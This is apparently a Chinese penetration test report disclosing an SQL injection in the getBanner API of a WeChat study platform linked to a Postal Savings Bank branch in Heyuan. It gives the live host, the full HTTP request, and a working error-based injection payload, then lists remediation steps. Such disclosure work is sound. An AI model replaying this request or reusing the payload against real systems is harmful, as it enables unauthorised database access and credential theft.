渗透测试报告

漏洞名称：188储银行河源市分行-保密学习-存在SQL注入漏洞（第二处getBanner接口）

漏洞等级：高危

所在位置：https://study.mzzfwl.com/api/Index/getBanner

漏洞描述：邮储银行河源市分行-保密学习-存在SQL注入漏洞（第二处getBanner接口）

漏洞详情：

访问邮储银行河源市分行微信公众号-保密学习

首页存在接口获取Banner

存在SQL注入漏洞

POST /api/Index/getBanner HTTP/2

Host: study.mzzfwl.com

Content-Length: 113

Xweb_xhr: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x6309080f)XWEB/8501

Content-Type: application/json

Accept: */*

Accept-Language: *

Sec-Fetch-Site: cross-site

Sec-Fetch-Mode: cors

Sec-Fetch-Dest: empty

Referer: https://servicewechat.com/wxc8321ccadec18dbf/8/page-frame.html

Accept-Encoding: gzip, deflate

{"page":1,"pagesize":5,"platform":"wx-hyxx'or(1)=cast(version() as numeric)and''='","token":0,"_device":"wechat"}

通过报错注入可获取到数据库版本

也可以获取数据库里的数据，比如管理员账号、密码

造成影响:

攻击者可以利用该漏洞执行任意SQL语句，如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。

修复建议：

1、对参数进行严格过滤；2、对进入数据库的特殊字符（'"\<>&*;等）进行转义处理，或编码转换；3、确认每种数据的类型，比如数字型的数据就必须是数字，数据库中的存储字段必须对应为int型；4、数据长度应该严格规定，能在一定程度上防止比较长的SQL注入语句无法正确执行；5、严格限制网站所用数据库账号的权限，给此用户仅提供能够满足其工作的权限，从而最大限度的减少注入攻击对数据库的危害。